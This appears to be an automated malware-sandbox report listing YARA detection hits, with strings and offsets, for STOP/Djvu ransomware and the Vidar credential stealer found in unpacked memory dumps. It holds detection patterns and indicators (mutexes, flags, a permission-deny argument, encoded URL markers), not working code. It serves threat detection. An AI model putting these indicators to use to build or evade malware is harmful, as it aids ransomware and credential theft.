9.0.Q5W0I0pzFI.exe.400000.5.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
16.0.build2.exe.400000.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.0.build2.exe.400000.7.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
16.0.build2.exe.400000.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x92dbc:$s1: JohnDoe 0x92db4:$s2: HAL9TH
16.0.build2.exe.400000.7.raw.unpack	MALWARE_Win_Vidar	Detects Vidar / ArkeiStealer	ditekSHen	0x970c0:$s1: "os_crypt":{"encrypted_key":" 0x9c9ec:$s2: screenshot.jpg 0x92edc:$s3: Content-Disposition: form-data; name="
8.0.Q5W0I0pzFI.exe.400000.4.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
8.0.Q5W0I0pzFI.exe.400000.4.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.0.Q5W0I0pzFI.exe.400000.4.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0.2.Q5W0I0pzFI.exe.21d15a0.1.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
0.2.Q5W0I0pzFI.exe.21d15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0.2.Q5W0I0pzFI.exe.21d15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.0.Q5W0I0pzFI.exe.400000.7.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
9.0.Q5W0I0pzFI.exe.400000.7.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.0.Q5W0I0pzFI.exe.400000.7.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
2.0.Q5W0I0pzFI.exe.400000.7.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
2.0.Q5W0I0pzFI.exe.400000.7.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
2.0.Q5W0I0pzFI.exe.400000.7.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.2.Q5W0I0pzFI.exe.400000.0.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
9.2.Q5W0I0pzFI.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.2.Q5W0I0pzFI.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
8.0.Q5W0I0pzFI.exe.400000.7.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
8.0.Q5W0I0pzFI.exe.400000.7.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.0.Q5W0I0pzFI.exe.400000.7.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
11.0.Q5W0I0pzFI.exe.400000.6.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
11.0.Q5W0I0pzFI.exe.400000.6.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
11.0.Q5W0I0pzFI.exe.400000.6.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
8.0.Q5W0I0pzFI.exe.400000.8.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
8.0.Q5W0I0pzFI.exe.400000.8.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.0.Q5W0I0pzFI.exe.400000.8.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
11.0.Q5W0I0pzFI.exe.400000.6.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
11.0.Q5W0I0pzFI.exe.400000.6.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
11.0.Q5W0I0pzFI.exe.400000.6.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.0.Q5W0I0pzFI.exe.400000.6.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
17.0.Q5W0I0pzFI.exe.400000.6.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.0.Q5W0I0pzFI.exe.400000.6.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
2.0.Q5W0I0pzFI.exe.400000.10.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
2.0.Q5W0I0pzFI.exe.400000.10.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
2.0.Q5W0I0pzFI.exe.400000.10.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
2.0.Q5W0I0pzFI.exe.400000.6.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
2.0.Q5W0I0pzFI.exe.400000.6.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
2.0.Q5W0I0pzFI.exe.400000.6.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.0.Q5W0I0pzFI.exe.400000.7.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
9.0.Q5W0I0pzFI.exe.400000.7.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.0.Q5W0I0pzFI.exe.400000.7.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.2.Q5W0I0pzFI.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
9.2.Q5W0I0pzFI.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.2.Q5W0I0pzFI.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.0.Q5W0I0pzFI.exe.400000.8.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
17.0.Q5W0I0pzFI.exe.400000.8.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.0.Q5W0I0pzFI.exe.400000.8.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.0.Q5W0I0pzFI.exe.400000.9.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
9.0.Q5W0I0pzFI.exe.400000.9.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.0.Q5W0I0pzFI.exe.400000.9.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.0.Q5W0I0pzFI.exe.400000.9.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
17.0.Q5W0I0pzFI.exe.400000.9.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.0.Q5W0I0pzFI.exe.400000.9.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
